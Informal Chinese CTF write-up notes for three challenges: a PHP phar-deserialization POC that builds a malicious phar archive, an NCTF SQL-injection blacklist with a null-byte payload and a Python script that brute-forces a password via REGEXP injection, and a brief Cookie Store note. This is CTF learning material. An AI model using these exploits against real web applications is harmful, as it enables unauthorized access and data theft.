[SWPUCTF 2018]SimplePHP

https://xz.aliyun.com/t/6454#toc-4

知识点:phar反序列化

img

本地调试的时候发现一个问题!

file.php

<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {

    echo "<h2>There is no file to show!<h2/>";
}


echo 111;
echo $file;
$show = new Show($file);

echo 1111111;
$bb = $_POST['1'];
unserialize($bb);

if(file_exists($file)) {
    echo 1;
    $show->source = $file;
    $show->_show();
} else if (!empty($file)){
    die('file doesn\'t exists.');
}
?>

这时我的调试文件!但是发现$show = new Show($file) $show = new Show() 里面没参数的时候本地就直接停止了!可以题目还是可以打通的!

poc

<?php

class C1e4r
{
    public $str;
    public function __construct()
    {
        $this->str = new Show();
    }
}

class Show
{
    public $str;

    public function __construct()
    {
        $this->str['str']=new Test();
    }
}
class Test
{
    public $params;
    public function __construct()
    {
        $this->params = array();
        $this->params['source'] = '/var/www/html/f1ag.php';
    }

}

$a = new C1e4r();
$b = serialize($a);
echo urlencode($b);
$phar = new Phar("1.phar"); //.phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); //固定的
$phar->setMetadata($a); //触发的头是C1e4r类,所以传入C1e4r对象
$phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名
$phar->stopBuffering();




//?file=phar://upload/585f1fbe32529f305013a803331675a1.jpg

//phar://upload/290b716447ed10fc5663195f9e34f86d.jpg


[NCTF2019]SQLi

知识点:regexp正则注入

https://xz.aliyun.com/t/8003#toc-4

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

不知道为什么%00明明过滤了还能用!

payload

username=ad\&passwd=/**/||/**/1;%00  后门必须来个空字节! 不然是最好那个单引号好像去不掉 和分号一起是又问题的!

image-20210730190422265

image-20210730190637243

image-20210730190908735

binary比较将字符串转换为二进制字符串

这里binary被办了!没有也行

like和REGEXP 一样都可以用16进制 用法一样

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/7/30 15:35
# @Author  : upload
# @File    : [NCTF2019]SQLi.py
# @Software: PyCharm

import requests
import string
import time

proxy = '127.0.0.1:8080'
proxies = {
    'http': 'http://' + proxy,
    'https': 'https://' + proxy,
}
dic = string.ascii_letters + string.digits + '_!@#$%^&*{}.-'
print(dic)
burp0_url = "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn:80/index.php"
burp0_cookies = {"UM_distinctid": "179a8787815906-09d310bee36c31-5771031-144000-179a87878164ad", "OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://2d7b07e2-08ce-4599-bead-39fff8394597.node4.buuoj.cn/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}


# burp0_data = {'username': 'ad\\', 'passwd': '/**/||/**/passwd/**/REGEXP/**/"^y";\x00'}
# r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,proxies=proxies)
#
# print(r.status_code)
# if 'The requested URL /welcome.php was not found on this server' in r.text:
#     print(11111)
#404  居然不能写302 算了算了

#这里为了区分大小写
def str2hex(string):
  result = ''
  for i in string:
    result += hex(ord(i))
  result = result.replace('0x','')
  return '0x'+result


flag=''


poc = '/**/||/**/passwd/**/REGEXP/**/{};\x00'
payload = ''
for i in range(1,1000):
    f=flag
    for j in dic:

        # print(j)
        passwd = str2hex('^' + flag + j) # 这里payload就不用带引号了! 带引号反而执行不了
        poc22=poc.format(passwd)
        # print(poc22)
        burp0_data = {"username": "ad\\", "passwd": poc22}
        # print(burp0_data)
        r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,proxies=proxies)
        if r.status_code == 404:
            flag += j
            print(flag)
            break
        elif r.status_code == 429:
            print('fast wait a little')
            time.sleep(3)

    if flag==f:
        break
print(flag)



#username=ad\&passwd=/**/||/**/1;%00

#^you_Will_never_kNow7788990$$$$$$$$$$$$$$$$$$$G

[watevrCTF-2019]Cookie Store

这啥题呀!

把session删了!发过去!

再修改买就行了!